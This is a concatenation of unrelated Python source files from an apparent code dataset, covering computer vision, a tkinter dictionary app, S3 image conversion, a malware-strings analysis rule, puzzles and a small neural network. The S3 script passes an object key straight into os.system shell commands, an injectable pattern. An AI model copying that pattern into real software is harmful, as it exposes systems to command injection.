preprocess_image(input_image):\n # preprocess the image\n preprocessed = cv2.resize(input_image, PREPROCESS_DIMS)\n preprocessed = preprocessed - 127.5\n preprocessed = preprocessed * 0.007843\n preprocessed = preprocessed.astype(np.float16)\n\n # return the image to the calling function\n return preprocessed\n\n\ndef predict(image, graph):\n # preprocess the image\n image = 
preprocess_image(image)\n\n # send the image to the NCS and run a forward pass to grab the\n # network predictions\n graph.LoadTensor(image, None)\n (output, _) = graph.GetResult()\n\n # grab the number of valid object predictions from the output,\n # then initialize the list of predictions\n num_valid_boxes = output[0]\n predictions = []\n\n # loop over results\n for box_index in range(int(num_valid_boxes)):\n # calculate the base index into our array so we can extract\n # bounding box information\n base_index = 7 + box_index * 7\n\n # boxes with non-finite (inf, nan, etc) numbers must be ignored\n if (not np.isfinite(output[base_index]) or\n not np.isfinite(output[base_index + 1]) or\n not np.isfinite(output[base_index + 2]) or\n not np.isfinite(output[base_index + 3]) or\n not np.isfinite(output[base_index + 4]) or\n not np.isfinite(output[base_index + 5]) or\n not np.isfinite(output[base_index + 6])):\n continue\n\n # extract the image width and height and clip the boxes to the\n # image size in case network returns boxes outside of the image\n # boundaries\n (h, w) = image.shape[:2]\n x1 = max(0, int(output[base_index + 3] * w))\n y1 = max(0, int(output[base_index + 4] * h))\n x2 = min(w, int(output[base_index + 5] * w))\n y2 = min(h, int(output[base_index + 6] * h))\n\n # grab the prediction class label, confidence (i.e., probability),\n # and bounding box (x, y)-coordinates\n pred_class = int(output[base_index + 1])\n pred_conf = output[base_index + 2]\n pred_boxpts = ((x1, y1), (x2, y2))\n\n # create prediction tuple and append the prediction to the\n # predictions list\n prediction = (pred_class, pred_conf, pred_boxpts)\n predictions.append(prediction)\n\n # return the list of predictions to the calling function\n return predictions\n\n\n# grab a list of all NCS devices plugged in to USB\nprint(\"[INFO] finding NCS devices...\")\ndevices = mvnc.EnumerateDevices()\n\n# if no devices found, exit the script\nif len(devices) == 0:\n print(\"[INFO] No devices found. Please plug in a NCS\")\n quit()\n\n# use the first device since this is a simple test script\n# (you'll want to modify this if using multiple NCS devices)\nprint(\"[INFO] found {} devices. device0 will be used. 
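# Toy decode of the SSD output layout predict() walks above: output[0]
# holds the valid-box count and each detection occupies seven floats
# [_, class, confidence, x1, y1, x2, y2] starting at offset 7. The values
# here are fabricated for illustration.
import numpy as np

output = np.zeros(14, dtype=np.float16)
output[0] = 1                                    # one valid box
output[7:14] = [0, 15, 0.82, 0.1, 0.2, 0.5, 0.9]
base = 7
print(int(output[base + 1]), float(output[base + 2]))  # 15 and ~0.82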
\"\n \"opening device0...\".format(len(devices)))\ndevice = mvnc.Device(devices[0])\ndevice.OpenDevice()\n\n# open the CNN graph file\nprint(\"[INFO] loading the graph file into RPi memory...\")\nwith open('graphs/mobilenetgraph', mode=\"rb\") as f:\n graph_in_memory = f.read()\n\n# load the graph into the NCS\nprint(\"[INFO] allocating the graph on the NCS...\")\ngraph = device.AllocateGraph(graph_in_memory)\n\n#add text\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n# open a pointer to the video stream thread and allow the buffer to\nprint(\"[INFO] starting the video stream and FPS counter...\")\nif RPI==0:\n vs = VideoStream(src=0).start()\nelse:\n vs = VideoStream(usePiCamera=True).start()\ntime.sleep(1)\n\n# loop over frames from the video file stream\nwhile True:\n try:\n # grab the frame from the threaded video stream\n # make a copy of the frame and resize it for display/video purposes\n Time_saving(0)\n frame = vs.read()\n Time_print(0)\n Time_saving(1)\n image_for_result = frame.copy()\n Time_print(1)\n Time_saving(2)\n image_for_result = cv2.resize(image_for_result, DISPLAY_DIMS)\n Time_print(2)\n\n # use the NCS to acquire predictions\n Time_saving(3)\n predictions = predict(frame, graph)\n Time_print(3)\n\n # loop over our predictions\n for (i, pred) in enumerate(predictions):\n # extract prediction data for readability\n Time_saving(4)\n (pred_class, pred_conf, pred_boxpts) = pred\n Time_print(4)\n\n # filter out weak detections by ensuring the `confidence`\n # is greater than the minimum confidence\n if pred_conf > confidence_basic:\n # print prediction to terminal\n #print(\"[INFO] Prediction #{}: class={}, confidence={}, \"\"boxpoints={}\".format(i, CLASSES[pred_class], pred_conf,pred_boxpts))\n\n # check if we should show the prediction data\n # on the frame\n Time_saving(5)\n if display > 0:\n # build a label consisting of the predicted class and\n # associated probability\n label = \"{}: {:.2f}%\".format(CLASSES[pred_class],\n pred_conf * 100)\n\n # extract information from the prediction boxpoints\n (ptA, ptB) = (pred_boxpts[0], pred_boxpts[1])\n ptA = (ptA[0] * DISP_MULTIPLIER, ptA[1] * DISP_MULTIPLIER)\n ptB = (ptB[0] * DISP_MULTIPLIER, ptB[1] * DISP_MULTIPLIER)\n (startX, startY) = (ptA[0], ptA[1])\n y = startY - 15 if startY - 15 > 15 else startY + 15\n\n # display the rectangle and label text\n cv2.rectangle(image_for_result, ptA, ptB,\n COLORS[pred_class], 2)\n cv2.putText(image_for_result, label, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, COLORS[pred_class], 3)\n Time_print(5)\n\n # FPS calculation\n Time_saving(6)\n fps_time_new = datetime.datetime.now()\n fps_delta = (fps_time_new - fps_time_old).total_seconds()\n fps_time_old = fps_time_new\n print(\"%1.2ffps\" % fps)\n\n\n if i_cycle == i_fps:\n fps = 1 / float(fps_delta)\n i_cycle = 0\n else:\n i_cycle += 1\n\n cv2.putText(image_for_result, \"%1.1f fps\" % fps, (10, 30),\n font, 1, (0, 0, 255), 2, cv2.LINE_AA)\n Time_print(6)\n # check if we should display the frame on the screen\n # with prediction data (you can achieve faster FPS if you\n # do not output to the screen)\n if display > 0:\n # display the frame to the screen\n Time_saving(7)\n cv2.imshow(\"Output\", image_for_result)\n Time_print(7)\n\n #wait escape\n if cv2.waitKey(1) & 0xFF == 27:\n break\n print(\"time lap: %1.3f\" % fps_delta)\n\n # if \"ctrl+c\" is pressed in the terminal, break from the loop\n except KeyboardInterrupt:\n break\n\n # if there's a problem reading a frame, break gracefully\n except AttributeError:\n break\n\n\n# destroy all windows 
if we are displaying them\nif display > 0:\n cv2.destroyAllWindows()\n\n# stop the video stream\nvs.stop()\n\n# clean up the graph and device\ngraph.DeallocateGraph()\ndevice.CloseDevice()\n\n","sub_path":"ncs_realtime_mobilenet_my.py","file_name":"ncs_realtime_mobilenet_my.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"631002108","text":"from tkinter import *\r\nfrom PIL import ImageTk,Image\r\nimport pyttsx3\r\nimport speech_recognition as sr\r\nfrom tkinter import messagebox\r\n# initializing the python text to speech\r\nengine= pyttsx3.init()\r\nrate=engine.getProperty(\"rate\")\r\nengine.setProperty(\"rate\",150)\r\n# opening the dictionary data, the JSON file\r\n# as it is a JSON file, we have to import the json module in order to access it\r\nimport json\r\ndata=json.load(open(\"data.json\"))\r\n\r\nwin=Tk()\r\nwin.title(\"Simple Dictionary\")\r\nwin.geometry(\"600x600+400+80\")\r\nwin.iconbitmap(\"dicticon.ico\")\r\n# add image to the window\r\nmyimg=ImageTk.PhotoImage(Image.open(\"binocular.png\"))\r\nmyimglabel=Label(image=myimg)\r\nmyimglabel.place(x=170,y=70)\r\ndef findword(word):\r\n\r\n # use a Toplevel window; a second Tk() root would conflict with the main one\r\n win2=Toplevel()\r\n win2.title(\"Output\")\r\n win2.geometry(\"700x700+400+80\")\r\n win2.iconbitmap(\"dicticon.ico\")\r\n\r\n\r\n try:\r\n meaning=data[word]\r\n display1=Label(win2,text=\"Output:\",font=(\"arial\",15,\"bold\"),bg=\"white\",fg=\"black\")\r\n display1.pack() \r\n for i in meaning:\r\n display=Label(win2,text=i,font=(\"arial\",10,\"bold\"),bg=\"white\",fg=\"black\")\r\n display.pack() \r\n #speaking what the meaning is\r\n engine.say(meaning) \r\n engine.runAndWait()\r\n except:\r\n display2=Label(win2,text=\"ERROR!\",font=(\"arial\",20,\"bold\"),bg=\"white\",fg=\"black\")\r\n display2.pack() \r\n display=Label(win2,text=\"Unable to find the meaning of the word:(\",font=(\"arial\",10,\"bold\"),bg=\"white\",fg=\"black\")\r\n display.pack()\r\n engine.say(\"Unable to find the meaning of the word, Please check whether you have given the correct spelling, If this is a flop in the program, please send us a mail to aforprog@gmail.com\")\r\n engine.runAndWait()\r\n display1=Label(win2,text=\"Please check whether you have given a valid word!\",font=(\"arial\",10,\"bold\"),bg=\"white\",fg=\"black\")\r\n display1.pack()\r\n#function before findword\r\ndef getfunction():\r\n getword=word.get().strip()\r\n word.delete(0,END)\r\n findword(getword)\r\n\r\n\r\n#heading\r\nheading=Label(win,text=\"Wanna test me? Give me some word. I will tell you the meaning in no time!\",font=(\"arial\",10,\"bold\"))\r\nheading.place(x=50,y=30)\r\n#space for entering the word\r\nword=Entry(win,textvariable=StringVar())\r\nword.place(x=200,y=300)\r\n#search button\r\nsbutton=Button(win,text=\"Search\",font=(\"arial\",10,\"bold\"),fg=\"white\",bg=\"grey\",command=getfunction)\r\nsbutton.place(x=330,y=295)\r\n\r\n#developed by\r\ndby=Label(win,text=\"Developed by:Anandhu S\",font=(\"arial\",13,\"bold\"))\r\ndby.place(x=390,y=520)\r\ndby1=Label(win,text=\"As the project is in its development stage, if a situation arises where you entered a valid word\\n and it is showing ERROR!, then please mail us with the word to:\\n aforprogramming@gmail.com\")\r\ndby1.place(x=10,y=550)\r\n\r\n#function for the speech recognition to take place\r\ndef speech():\r\n r=sr.Recognizer()\r\n\r\n with sr.Microphone() as source:\r\n r.adjust_for_ambient_noise(source)\r\n\r\n audio=r.listen(source)\r\n\r\n try:\r\n findword(r.recognize_google(audio))\r\n except:\r\n messagebox.showerror(\"Error\",\"There was some error in the part of voice recognition.\")\r\n\r\n\r\n# keep the button name distinct from the speech() function it calls\r\nspeech_btn=Button(win,text=\"Use voice assistant\",fg=\"white\",bg=\"grey\",command=speech)\r\nspeech_btn.place(x=240,y=350)\r\n\r\nwin.mainloop()\r\n","sub_path":"version1.2/dicttk1.2.py","file_name":"dicttk1.2.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"617626237","text":"import os\nimport re\nimport sys\nimport boto3\nfrom PIL import Image\n\ndef extract_img_data(img_full_name):\n #EXTRACTS IMAGE WIDTH AND HEIGHT\n # print(imgname)\n imgname = img_full_name.split('.')[0]\n # print(imgname)\n width_start = [m.end(0) for m in re.finditer('_w_', imgname)][0]\n width_end = [m.start(0) for m in re.finditer('_h_', imgname)][0]\n height_start = [m.end(0) for m in re.finditer('_h_', imgname)][0]\n # print(width_start, width_end, height_start)\n width = (int)(imgname[width_start:width_end])\n height = (int)(imgname[height_start:])\n size = (width, height)\n return size\n\ndef save_image(img_full_name, extension, main_path, size):\n\t#CONVERTS IMAGE FROM EMF/WMF TO PDF TO JPG\n\tos.system(\"libreoffice --headless --convert-to pdf \" + main_path + img_full_name + \" --outdir \" + main_path)\n\timg_full_name = img_full_name.split('.')[0]\n\tos.system(\"convert -density 150 \" + main_path + img_full_name + \".pdf \"\n\t + \"-quality 100 \" + main_path + img_full_name + \".jpg\")\n\timg=Image.open(main_path + img_full_name + '.jpg')\n\t# print(img.size)\n\tw=img.size[0]\n\th=img.size[1]\n\tw_size = size[0]\n\th_size = size[1]\n\tw_start = w/2-w_size\n\th_start = h/2-h_size\n\tarea=(w_start, h_start, w_start+2*w_size, h_start+2*h_size)\n\timg = img.crop(area)\n\timg_name = img_full_name[0:[m.start(0) for m in re.finditer('_w_', img_full_name)][0]] + '.jpg'\n\timg.save(main_path + img_name)\n\treturn img_name\n\ns3_client = boto3.client('s3')\nfrom_bucket = os.environ.get('FROM_BUCKET')\nto_bucket = os.environ.get('TO_BUCKET')\nkey = os.environ.get('OBJECT_KEY')\nprefix = os.environ.get('BUCKET_PATH_PREFIX')\n\n# from_bucket = \"testforimage2\"\n# to_bucket = \"testforimage2\"\n# key = \"raw/uploads/qimages/41717/image11_w_33_h_24.wmf\"\n# prefix = \"raw/\"\n# print(from_bucket, to_bucket, key, prefix)\n\n\nimg_full_name = os.path.basename(key)\nextension = img_full_name[img_full_name.find('.'):]\n# main_path = '/mnt/D/CS/Pariksha/WordProcessing/docker_word/docker_ubuntu/downloads/'\nmain_path = 
'/root/scripts/convert_image/downloads/'\ndownload_path = main_path + img_full_name\n# print(key)\n# print(download_path)\n\ntry:\n\ts3_client.download_file(from_bucket, key, download_path)\n\tsize = extract_img_data(img_full_name)\n\timg_name = save_image(img_full_name, extension, main_path, size)\n\tupload_path = main_path + img_name\n\tupload_key = key[key.find(prefix)+len(prefix):key.find(\"_w_\")] + '.jpg'\n\ts3_client.upload_file(upload_path, to_bucket, upload_key.lower(), ExtraArgs={'ACL':'public-read'})\n\ts3_client.delete_object(Bucket=from_bucket, Key=key)\n\nexcept Exception as e:\n print('Error! Code: {c}, Message: {m}'.format(c = type(e).__name__, m = str(e)))\n\n","sub_path":"emf_conv.py","file_name":"emf_conv.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"80861260","text":"from lib.rules import Rules\nfrom lib.parser import Parser\nimport time\n\nclass Cmd(Rules):\n \"\"\"\n This class is used to extract Linux command lines from malware\n binary strings. It also inherits from the Rules object, which gathers\n all shared functions and variables.\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n Initialize the type and info_msg attributes, which respectively represent\n the type of extracted information (here command line - cmd) and\n the message to display when the rule is initialized.\n \"\"\"\n\n Rules.__init__(self)\n self.type = \"cmd\"\n self.info_msg = \"-> Cmd analysis \"\n\n def run_analysis(self, string_list):\n \"\"\"\n This method is used by the core to run the analysis and extract strings\n matching the \"command line\" type.\n\n :param string_list: All strings to analyse.\n :type string_list: List\n :return: A list of strings without the strings previously matched.\n :rtype: List\n \"\"\"\n epur_string_list = []\n\n self.bar.init(string_list, self.info_msg + \"is running\")\n for string in string_list:\n cmd_found = Parser.getCmd(string)\n if cmd_found is not None:\n self.db.createEntry(string, cmd_found, self.type)\n else:\n epur_string_list.append(string)\n self.bar.update()\n self.bar.close(self.info_msg + \"is complete\", True)\n return epur_string_list\n","sub_path":"utils/malwareStringsAnalyzer/lib/allRules/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"521372637","text":"import math\n\ndef two_sum_to(my_list, total):\n for item in my_list:\n remainder = total - item\n if remainder > 0:\n list_copy = my_list.copy()\n list_copy.remove(item)\n if remainder in list_copy:\n return (item, remainder)\n return None\n\ndef three_sum_to(my_list, total):\n # for i in my_list:\n # for j in my_list:\n # for k in my_list:\n # if i != j and j != k and i + j + k == total:\n # return (i, j, k)\n # return None\n for i, item in enumerate(my_list):\n remainder = total - item\n if remainder > 0:\n # search the rest of the list (excluding this item) for a pair;\n # removing items from my_list while iterating over it skips elements\n result = two_sum_to(my_list[:i] + my_list[i + 1:], remainder)\n if result is not None:\n return (item, result[0], result[1])\n return None\n\nif __name__ == '__main__':\n test_result = two_sum_to([1721, 979, 366, 299, 675, 1456], 2020)\n # assert test_result == (1721, 299) or test_result == (299, 1721)\n print(test_result)\n \n with open('input.txt', 'r') as f:\n expenses = [int(n.strip()) for n in f.readlines()]\n result = two_sum_to(expenses, 2020)\n\n if result is not None:\n print('{} * {} = {}'.format(result[0], result[1], result[0] * result[1]))\n else:\n print('Result not 
found')\n\n result = three_sum_to(expenses, 2020)\n\n if result is not None:\n print('{} * {} * {} = {}'.format(result[0], result[1], result[2], result[0] * result[1] * result[2]))\n else:\n print('Result not found')","sub_path":"2020/day/1/report_repair.py","file_name":"report_repair.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563026056","text":"\"\"\"registration date to Doctors\n\nRevision ID: 3bf2ebc70e9\nRevises: b38b44024c\nCreate Date: 2015-06-18 22:47:35.364496\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '3bf2ebc70e9'\ndown_revision = 'b38b44024c'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('doctors', sa.Column('registration_date', sa.DateTime(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('doctors', 'registration_date')\n ### end Alembic commands ###\n","sub_path":"server/doctor/db/alembic/versions/3bf2ebc70e9_registration_date_to_doctors.py","file_name":"3bf2ebc70e9_registration_date_to_doctors.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"483084264","text":"import time\nfrom plyer import notification\nfrom notifyme.messages_dict import dict_message\nimport random\n\nif __name__ == \"__main__\":\n message_choice = random.randint(0, 17)\n while True:\n notification.notify(\n app_name=\"Water-Notifier\",\n title=\"Please drink Water\",\n message=dict_message[message_choice],\n timeout=10\n )\n time.sleep(60*60)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"270016016","text":"#coding: utf-8\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef sample_distribution(p):\n if random.uniform(0, 1) < p:\n return '0'\n else:\n return '1'\n\n\ndef binary2decimal(key):\n decimal = 0\n for k in range(len(key)):\n decimal += int(key[k]) * (2 ** (len(key) - k - 1))\n return decimal\n\n\ndef calculate_weight(decimal, alpha, z):\n return (alpha ** abs(z - decimal)) * (1 - alpha)/(1 + alpha)\n\n\ndef sample_data(dic, p, n, alpha, z):\n binary = ''\n for j in range(n):\n sub_key = sample_distribution(p)\n binary += sub_key\n decimal = binary2decimal(binary)\n weight = calculate_weight(decimal, alpha, z)\n\n if binary in dic:\n dic[binary] += weight\n else:\n dic[binary] = weight\n return dic\n\n\ndef compute_target(dic, i, sum_all, sum_sub):\n for k in dic:\n sum_all += dic[k]\n if k[i] == '1':\n sum_sub += dic[k]\n return float(sum_sub)/sum_all\n\n\nif __name__ == '__main__':\n N = 10\n ALPHA = 0.2\n Z = 128\n sample_amount = 200\n P = 0.5\n\n sum_all = 0\n sum_sub = [0 for _ in range(11)]\n dic = {}\n x = np.arange(1, sample_amount + 1)\n result2 = []\n result4 = []\n result6 = []\n result8 = []\n result10 = []\n\n for k in range(0, sample_amount):\n sample_data(dic, P, N, ALPHA, Z)\n #print(compute_target(dic, 2, sum_all, sum_sub))\n result2.append(compute_target(dic, N - 2, sum_all, sum_sub[2]))\n result4.append(compute_target(dic, N - 4, sum_all, sum_sub[4]))\n result6.append(compute_target(dic, N - 6, sum_all, sum_sub[6]))\n 
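# Note (descriptive comment, added for clarity): dic and compute_target together\n # implement likelihood weighting: each sampled bit string accumulates a weight\n # proportional to alpha**abs(z - decimal), and compute_target returns the weighted\n # fraction of samples whose chosen bit is '1', i.e. an estimate of\n # P(bit = 1 | Z = z) that settles down as samples accumulate.\n 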
result8.append(compute_target(dic, N - 8, sum_all, sum_sub[8]))\n result10.append(compute_target(dic, N - 10, sum_all, sum_sub[10]))\n\n plt.figure(1)\n\n plt.plot(x, result2)\n plt.plot(x, result4)\n plt.plot(x, result6)\n plt.plot(x, result8)\n plt.plot(x, result10)\n\n print(result2[-1])\n print(result4[-1])\n print(result6[-1])\n print(result8[-1])\n print(result10[-1])\n\n plt.show()\n\n\n","sub_path":"CSE250A/cse250a-hw3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488781365","text":"import email_list\nimport smtplib, logger\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\n\n\nclass Email(object):\n def __init__(self, pwwd, stock, txt):\n self.stock = stock\n self.toaddr = email_list.email # enter email for to addr\n self.txt = txt\n self.pwwd = pwwd\n\n def send(self):\n fromaddr = email_list.email # enter your email\n msg = MIMEMultipart()\n msg['Subject'] = \"Stock \" + str(self.stock)\n msg['From'] = fromaddr\n msg['To'] = self.toaddr\n\n body = self.txt + str(self.stock)\n msg.attach(MIMEText(body, 'plain'))\n\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n try:\n server.login(fromaddr, self.pwwd)\n except EnvironmentError as e:\n logger.log(e)\n text = msg.as_string()\n server.sendmail(fromaddr, self.toaddr, text)\n server.quit()\n","sub_path":"stock_email.py","file_name":"stock_email.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"479378814","text":"import numpy as np\nimport sys\nclass NeuralNetwork:\n def __init__(self, sizes, activation=\"relu\"):\n \"\"\"The list ``sizes`` contains the number of neurons in the respective\n layers of the network. For example, if the list was [2, 3, 1]\n then it would be a three-layer network, with the first layer\n containing 2 neurons, the second layer 3 neurons, and the\n third layer 1 neuron.\n\n ``activation`` is for the hidden layers, it must be a sting, either \"sigmoid\" or \"tanh\" or \"relu\" or \"leaky_relu\"\n \"\"\"\n if not (activation == \"sigmoid\" or activation == \"tanh\" or activation == \"relu\" or activation == \"leaky_relu\"):\n sys.exit('Ooops! activation function must be \"sigmoid\" or \"tanh\" or \"relu\" or \"leaky_relu\"')\n elif (type(sizes) != list):\n sys.exit('Ooops! 
sizes must be a list')\n \n self.num_layers = len(sizes)\n self.sizes = sizes\n self.activation = activation\n self.initialize_weights()\n \n def initialize_weights(self):\n \"\"\" Initialize our weights and biases with numbers drawn from a normal distribution \n with mean=0 and std=1 \n \"\"\"\n self.weights = [np.random.normal(0, 1, (outputSize, inputSize)) for outputSize, inputSize in zip(self.sizes[1:], self.sizes[:-1])]\n self.biases = [np.random.normal(0, 1, (outputSize, 1)) for outputSize in self.sizes[1:]]\n \n def SGD(self, training_data, lr=0.01, epochs=1):\n \"\"\" stochastic gradient descent - update weights after every training example \n ``training_data`` is a list of tuples ``(x, y)`` representing the training inputs \n and the desired outputs.\n ``epochs`` = number of iterations we want to go through the training data\n ``lr`` = learning rate, how fast our neural network learns the cost function gradient\n \"\"\"\n self.total_costs = []\n if type(training_data) != list: training_data = list(training_data)\n for epoch in range(epochs):\n self.epoch_costs = []\n for x, y in training_data:\n nablaWs, nablaBs = self.backprop(x, y)\n self.weights = [w-(lr*nw) for w,nw in zip(self.weights,nablaWs)]\n self.biases = [b - (lr * nb) for b, nb in zip(self.biases, nablaBs)]\n self.total_costs.append([epoch+1, (sum(self.epoch_costs)/len(self.epoch_costs))[0][0]])\n \n def feedforward(self, inputs):\n \"\"\"Return the outputs of the network for each input in ``inputs``.\n The activation function is not applied on the last layer.\n \"\"\"\n outputs = []\n for a in inputs:\n a = np.array([a]).reshape((self.sizes[0],1))\n for idx, (w, b) in enumerate(zip(self.weights, self.biases)):\n if idx == (len(self.weights) - 1):\n a = np.matmul(w, a) + b\n else:\n a = self.activation_fn(np.matmul(w, a) + b)\n outputs.append(a)\n return outputs\n \n def backprop(self, x, y):\n \"\"\" reshape inputs and labels \"\"\"\n x = np.array([x]).reshape((self.sizes[0], 1))\n y = np.array([y]).reshape((self.sizes[-1], 1))\n\n \"\"\" arrays to store weights and biases derivatives \"\"\"\n nablaWs = [np.zeros(w.shape) for w in self.weights]\n nablaBs = [np.zeros(b.shape) for b in self.biases]\n\n \"\"\" arrays to store outputs of each layer \"\"\"\n zLayers = [x] \n aLayers = [x]\n \n \"\"\" feedforward with input x, store outputs, z, and activations of z of each layer \"\"\"\n for w, b in zip(self.weights, self.biases):\n z = np.matmul(w, aLayers[-1]) + b\n zLayers.append(z)\n if (len(zLayers) == self.num_layers):\n a = z\n else:\n a = self.activation_fn(z)\n aLayers.append(a)\n \n \"\"\" Append cost of step to self.costs so we can plot our costs later \"\"\"\n self.epoch_costs.append(self.cost_fn(aLayers[-1], y))\n\n \"\"\" Begin Backpropagation\n get d of cost w.r.t final layer, δᴸ = ∇ₐC ⊙ σ′(zᴸ) \n Multiply cost_prime * 1 because σ′(zᴸ) is linear so it equals 1\n \"\"\"\n delta = self.cost_fn_prime(aLayers[-1], y) * 1\n \n \"\"\" backpropagate error to each layer in nn, store each d of cost w.r.t weight layer as nabla_w\n δˡ = ((wˡ⁺¹)ᵀδˡ⁺¹) ⊙ σ′(zˡ).\n ∇w = δˡ(aˡ⁻¹)ᵀ\n ∇b = δˡ\n \"\"\"\n for l in range(1, self.num_layers):\n nablaWs[-l] = np.dot(delta, aLayers[-l - 1].transpose())\n nablaBs[-l] = delta\n delta = np.dot(self.weights[-l].transpose(),delta) * self.activation_fn_prime(zLayers[-l-1])\n\n return nablaWs, nablaBs\n \n def activation_fn(self, z):\n if self.activation == \"sigmoid\":\n return 1.0 / (1.0 + np.exp(-z))\n elif self.activation == \"tanh\":\n return np.tanh(z)\n elif self.activation == \"relu\":\n return np.maximum(0, z)\n 
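# descriptive comment (added): the leaky variant below keeps a small slope (0.01)\n # for z <= 0, so units still receive a gradient where plain ReLU would go\n # permanently dead\n 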
elif self.activation == \"leaky_relu\":\n return np.maximum(0.01 * z, z)\n \n def activation_fn_prime(self, z):\n if self.activation == \"sigmoid\":\n return self.activation_fn(z) * (1 - self.activation_fn(z))\n elif self.activation == \"tanh\":\n return (1 - (np.tanh(z)** 2))\n elif self.activation == \"relu\":\n z[z <= 0] = 0\n z[z > 0] = 1\n return z\n elif self.activation == \"leaky_relu\":\n z[z <= 0] = 0.01\n z[z > 0] = 1\n return z\n \n def cost_fn(self, a, y):\n return 0.5 * ((y - a)** 2)\n \n def cost_fn_prime(self, a, y):\n return (a - y)\n\n ","sub_path":"ApproximatingSine/ApproxSine/neuralnetwork_ex3.py","file_name":"neuralnetwork_ex3.py","file_ext":"py","file_size_in_byte":5795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331097848","text":"import numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nmatrix = np.loadtxt('data.txt', delimiter='\\t', skiprows=1)\r\n\r\ncnt = 1\r\n\r\nfor j in range(1, 10, 1):\r\n for k in range(j+1, 11, 1):\r\n x1 = np.array([])\r\n y1 = np.array([])\r\n x2 = np.array([])\r\n y2 = np.array([])\r\n\r\n for i in range(0, 999, 1):\r\n if matrix[i][0] == 1.:\r\n x1 = np.append(x1, matrix[i][j])\r\n y1 = np.append(y1, matrix[i][k])\r\n else:\r\n x2 = np.append(x2, matrix[i][j])\r\n y2 = np.append(y2, matrix[i][k])\r\n\r\n plt.scatter(x1, y1, color=\"red\")\r\n plt.scatter(x2, y2, color=\"blue\")\r\n\r\n plt.title('Feature-' + str(j) + ' vs ' + 'Feature-' + str(k))\r\n plt.xlabel('Feature-' + str(j))\r\n plt.ylabel('Feature-' + str(k))\r\n plt.legend(['Label 1', 'Label 2'])\r\n plt.savefig('outputs/plot '+str(j)+' '+str(k)+'.png')\r\n\r\n plt.clf()\r\n print('Done '+str(cnt))\r\n cnt = cnt + 1\r\n","sub_path":"Phase 3 - 2020 (Summer)/Week 1 (Mar 28 - Apr 4)/Shreya Goel_190102072/PlotFeatures.py","file_name":"PlotFeatures.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639253490","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n# Copyright 2011-2015, Nigel Small\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom io import StringIO\nfrom warnings import warn\nimport webbrowser\n\nfrom py2neo.compat import integer, string, ustr, xstr\nfrom py2neo.env import NEO4J_AUTH, NEO4J_URI\nfrom py2neo.http import authenticate, Resource, ResourceTemplate\nfrom py2neo.packages.httpstream.packages.urimagic import URI\nfrom py2neo.primitive import \\\n Node as PrimitiveNode, \\\n Relationship as PrimitiveRelationship, \\\n Path as PrimitivePath, \\\n coerce_property\nfrom py2neo.status import BindError, GraphError\nfrom py2neo.util import is_collection, round_robin, version_tuple, \\\n ThreadLocalWeakValueDictionary, deprecated\n\n\n__all__ = [\"DBMS\",\n \"Graph\",\n \"Entity\",\n \"Node\",\n \"Relationship\",\n \"Path\",\n \"graphy\",\n \"node\",\n \"relationship\"]\n\n\nclass DBMS(object):\n \"\"\" Wrapper for the base REST resource exposed by a running Neo4j\n server, 
